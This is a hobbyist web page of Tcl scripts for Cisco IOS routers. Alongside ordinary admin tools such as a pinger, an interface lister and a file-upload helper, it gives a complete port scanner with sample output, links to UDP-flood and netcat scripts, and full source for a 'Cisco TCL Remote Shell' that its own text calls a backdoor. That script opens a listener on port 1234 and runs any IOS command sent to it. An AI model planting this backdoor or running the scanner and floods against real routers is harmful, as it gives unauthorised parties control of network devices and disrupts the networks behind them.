Cisco TCL Scripts
 
Usefull TCL Scripts for running on an Cisco router with TCL in the IOS
 
swisslotto.tcl generate random 6 numbers from 42

Fun TCL Scripts
 
Some TCL Games running on the ROuter
 

TCL Portscanner
For a Proof of Concept i have written the following scripts
the script is slow, if ip's or ports are not available
 
 #
 # simple portscanner per ip
 # (proof of concept)
 # Version 0.7b
 # date 01.10.2008
 # (c) by packetlevel.ch
 #
 # 
 # ios installation:
 #
 #     download the file scanip.tcl into flash:scanip.tcl
 #     configure a alias:  alias exec scanip tclsh flash:scanip.tcl
 #     execute with: scanip [ip-address] [port] [port]
 #                   scanip [ip-address]               <- scan the ip with a default port list
 #  
 #
 #################################################
 #
 # known bugs. 
 # 
 # - slow, if ip dosn't exist
 # - 
 #
 #################################################
 #
 # scanip help
 #
 proc scanhelp {} {
 puts {scanip.tcl Version 0.7b / (c) 2008 by packtlevel.ch}
 puts {Usage: scanip [ip-address] [port] [port] ...}; 
 puts {       scanip [ip-address]  (use default port list)};
 }
 #
 # simple ip address test
 #
 proc isIP {str} {
    set ipnum1 {\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5]}
    set ipnum2 {\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5]}
    set ipnum3 {\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5]}
    set ipnum4 {\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5]}
    set fullExp {^($ipnum1)\.($ipnum2)\.($ipnum3)\.($ipnum4)$}
    set partialExp {^(($ipnum1)(\.(($ipnum2)(\.(($ipnum3)(\.(($ipnum4)?)?)?)?)?)?)?)?$}
    set fullExp [subst -nocommands -nobackslashes $fullExp]
    set partialExp [subst -nocommands -nobackslashes $partialExp]
       if [regexp -- $fullExp $str] {
          return 1
       } else {
          return 0
       }
 }
 #
 # simple port check ( 1 - 65535 ) 
 #
 proc isPORT {dport} {
  set isPORT "1"
  if {[string is integer $dport] == 1} then {
     if {$dport > 65535} then {set isPORT "0"}
     if {$dport < 1}   then {set isPORT "0"}
    } else { set isPORT "0" }
  return $isPORT
 }
 #
 # default scan  with a default port list
 #
 proc defaultscan  {daddr} {
 	foreach port {21 22 23 25 80 110 443 445 3128 8080 } {
 	connect $daddr $port 
	}
 }
 #
 # simple try and error to connect 
 #
 proc connect {host port} {
 if {[catch {
     set sock [socket $host $port]
     } msg ] != 0} {
     puts "$host $port Close" 
     } else {
     puts "$host $port Open" 
     }
 }
 #################################################
 #
 # main / arguments 
 #
 if { $::argc > 0 } { 
	set ipaddr [lindex $argv 0 ]
 #	puts "IP Adresse $ipaddr" 
	if {! [isIP $ipaddr]}  { scanhelp;return  }
	set i 1
	set max $argc
	if { $max < 2 } { defaultscan $ipaddr} 
	while {$i< $max} {
   		 set port [lindex $argv $i]
 #   		 puts "Target  $ipaddr $port"
   		 if {! [isPORT $port]} { puts "invalid port: $port" } else {
    		      connect $ipaddr $port
    		      }
   		 incr i
		 }

        } else {
		scanhelp;
	        return;
  	        }
  
download the file scanip.tcl into flash:scanip.tcl
configure a alias: alias exec scanip tclsh flash:scanip.tcl
execute with: scanip [ip-address]
 evil-router#scanip 192.168.1.156
 192.168.1.156 21 Close
 192.168.1.156 22 Open
 192.168.1.156 23 Open
 192.168.1.156 25 Close
 192.168.1.156 80 Open
 192.168.1.156 110 Close
 192.168.1.156 443 Close
 192.168.1.156 8080 Close
Be sure, you download the latest version !
 scanip8.tcl (NEW)
 scanip7b.tcl
 scannet.tcl

Cisco Netcat
 
Cisco TCL Version of NETCAT cisco netcat
 cnc.tcl

pinger
 
For example, if you do like to implement a comfortable Tcl-based pinger, store the following Tcl code into the file flash:pinger.tcl ...
	proc pinger { iplist } {
	  foreach ip $iplist {
	    if { [regexp "(!!!)" [exec "ping $ip timeout 1" ]] } {
	      puts "$ip"
	    } else { puts "$ip **** failed ***" }
	  }
	}
... and configure
	scripting tcl init flash:pinger.tcl.
Now you can ping a number of hosts in a single operation:
	
	R1#tclsh
	R1(tcl)#pinger { 10.0.0.1 10.0.0.2 10.0.0.3 10.0.0.4 }
	10.0.0.1
	10.0.0.2
	10.0.0.3 **** failed ***
	10.0.0.4 **** failed **
Or as TCL Script for individual use.
	foreach ip {
	1.1.1.1
	2.2.2.2
	} {
	if { [regexp "(!!!)" [exec "ping $ip timeout 1" ]] } {
	puts "$ip"
	} else { puts "$ip **** failed ***" }
	}


udpflood
 
This simple script generates udp packets to specific destination IP and port, from a free selectable source ip address
For more information, see on my udpflood text
 udpflood.tcl

Cisco TCL Remote Shell
 
This Script creats a backdor on an Cisco Router (with TCL)
 
# TclShell.tcl v0.1 by Andy Davis, IRM 2007
#
# IRM accepts no responsibility for the misuse of this code
# It is provided for demonstration purposes only
proc callback {sock addr port} {
fconfigure $sock -translation lf -buffering line
puts $sock " "
puts $sock "-------------------------------------"
puts $sock "TclShell v0.1 by Andy Davis, IRM 2007"
puts $sock "-------------------------------------"
puts $sock " "
set response [exec "sh ver | inc IOS"]
puts $sock $response
set response [exec "sh priv"]
puts $sock $response
puts $sock " "
puts $sock "Enter IOS command:"
fileevent $sock readable [list echo $sock]
}
proc echo {sock} {
global var
if {[eof $sock] || [catch {gets $sock line}]} {
} else {
set response [exec "$line"]
puts $sock $response
}
}
set port 1234
set sh [socket -server callback $port]
vwait var
close $sh

File Upload
 
Scipt for uploading TCL Scripts , if you now have a TFTP or equal server
 
	#
	# Copyright (c) 2008 NIL Data Communications
	# All rights reserved.
	#
	# by:       Ivan Pepelnjak, NIL Data Communications
	# title:    Copies file from STDIN to flash
	# name:     storeFile.tcl
	# desc:     The script copies text content from STDIN to specified file
	# params:   fileName - name of the file to be written
	#           force    - optional, force the overwrite
	#
	# ios config:
	#
	#           * download the file into flash:storeFile.tcl
	#           * configure alias exec store tclsh flash:storeFile.tcl
	#
	#           * optionally configure alias for a single file
	#             configure alias exec sf tclsh flash:storeFile.tcl flash:myfile.tcl force
	#
	#           invoke with store fileName [force]
	#
	 

	set fileName [lindex $argv 0]
	set force    [string equal [lindex $argv 1] "force"]
	
	if { [file exists $fileName] == 1 && $force == 0 } {
 	 puts -nonewline "File $fileName exists, overwrite? "; flush stdout
	  if { ! [string equal [string tolower [string index [gets stdin] 0]] "y"] } {
	    puts "Aborted"; return
	  }
	}
 
	fconfigure stdin -blocking 1 -buffering full
	puts "Enter content for $fileName, finish with ctrl/C"
	set content [read stdin]
	set channel [open "$fileName" w+]
	puts $channel $content
	close $channel
	puts "File $fileName successfully written"

ipInterfaces.tcl
 
Script to display interface IP addresses, masks and MTU sizes in a tabular format
 
#
# Copyright (c) 2007 NIL Data Communications
# All rights reserved.
#
# by:       Ivan Pepelnjak, NIL Data Communications
# title:    Display IP interface parameters in tabular format
# name:     ipInterfaces.tcl
# desc:     This script displays IP address, subnet mask and IP MTU size in a tabular format
# history:  Version 2. Fixed the IP address format issues (see ip netmask-format).
#
# ios config:
#
#           * download the file into flash:ipInterfaces.tcl
#           * configure alias exec ipconfig tclsh flash:ipInterfaces.tcl
#
#           invoke with ipconfig [active|configured|address]
#
 
proc printInterface {dataName} {
  upvar $dataName data
  global lineFormat paramActive paramConfig
  if {! [array exists data]} { return }
  if {$paramActive != 0} { if {! [string equal $data(IFSTAT) "up"]} { return } }
  if {$paramConfig != 0} { if {[string equal $data(IPADDR) "no address"]} { return } }
 
  puts [format $lineFormat $data(IFNAME) $data(IPADDR) $data(IPMTU) $data(IFSTAT)]
}
 
proc usage {} { puts {Syntax: ipconfig [active|configured|address]} }
 
proc parseParams {} {
  global paramActive paramConfig paramAddress argv
 
  set paramActive  0
  set paramConfig  0
  set paramAddress 0
 
  foreach par $argv {
    switch $par {
      active     { set paramActive 1 }
      configured { set paramConfig 1 }
      address    { set paramAddress 1 }
      help       { usage; return 1; }
      default    { usage; return 1; }
    }
  }
  return 0;
}
 
if {[parseParams] == 1} {return}
set lineFormat "%-20s %-20s %5s %s"
puts [format $lineFormat {Interface} {IP Address} {MTU} {State}]
puts "=============================================================="
exec {terminal ip netmask-format bit-count}
set cmdtext [exec {show ip interface}]
##set paramActive [string equal [lindex $argv 0] "active"]
 
foreach line [split $cmdtext "\n"] {
  if {[regexp -nocase {^(\S+) is (.*), line protocol is (\S+)} $line ignore ifname ifstat iflstat]} {
    printInterface ifdata
    set ifdata(IFNAME) $ifname
    set ifdata(IPADDR) "no address"
    set ifdata(IPMTU) ""
    set ifdata(IFSTAT) $ifstat
    if {[string equal $ifstat "up"]} {
      if {![string equal $iflstat "up"]} { set ifdata(IFSTAT) "$ifstat/$iflstat" }
    }
    regsub -all {administratively} $ifdata(IFSTAT) "admin" ifdata(IFSTAT)
  } elseif {[regexp -nocase {internet address is ([0-9.]+/[0-9]+)} $line ignore ipaddr]} {
    set ifdata(IPADDR) $ipaddr
  } elseif {[regexp -nocase {Using address of (\S+)\s+\(([0-9.]+)\)} $line ignore ipif ipaddr]} {
    set ifdata(IPADDR) $ipif
    if {$paramAddress != 0} { set ifdata(IPADDR) "$ipaddr (U)" }
  } elseif {[regexp -nocase {MTU is ([0-9]+)} $line ignore ipmtu]} {
    set ifdata(IPMTU) $ipmtu
  }
}
if {[array exists ifdata]} { printInterface ifdata }
exec {terminal no ip netmask-format bit-count}



Copy Text into a file
 
For creating a file with simple cut and paste, here a sample with TCL.
Enter following lin in the tclsh, (do not enter RETURN on the end of the Line
	puts [open "flash:filename" w+] { 
Cut and paste the input here..
and then enter
	} RETURN
and now quit tclsh.
and the File is now on the flash:

Other TCL Scripts
 
Usefull TCL Scripts and Code Snippets for running on an Cisco router with TCL in the IOS
 
 show_section.tcl Show commands and subcommands of regexp
 get_shversion.txt

IOSmap TCL Script
 
Other IOS Portscanner TCL Script
 
IOSmap Documenation
IOSmap.tcl
services.list (requierd for IOSmap.tcl)

Cisco TCL wtitter API
 
This TCL Script create new twitter messages on www.twitter.com by using the twitter API.
 
ciscotwitter.tcl

Cisco TCL UDP + TCP
 
Since IOS 15.1T, we can create UDP packets.
 
proc udp_puts {} {
    set s [udp_open]
    fconfigure $s -translation binary
    fconfigure $s -remote [list 192.168.2.41 666]
    set ch[] "\x64\x33\x00\x64"
    puts -nonewline $s $ch
    close $s
}
udp_puts


proc tcp_puts {} {
    set s [socket 192.168.2.41 666]
    fconfigure $s -translation binary
    set ch[] "\x64\x33\x00\x64"
    puts -nonewline $s $ch
    close $s
}
tcp_puts
Some Sample Scripts:
udpflood2.tcl a tcl script, that generate UDP Traffic
snmpget_id Sample Scripts for requesting SNMP (UDP) to a external hosts.

(c) 2009/2010 by packetlevel.ch / last update: 07.11.2010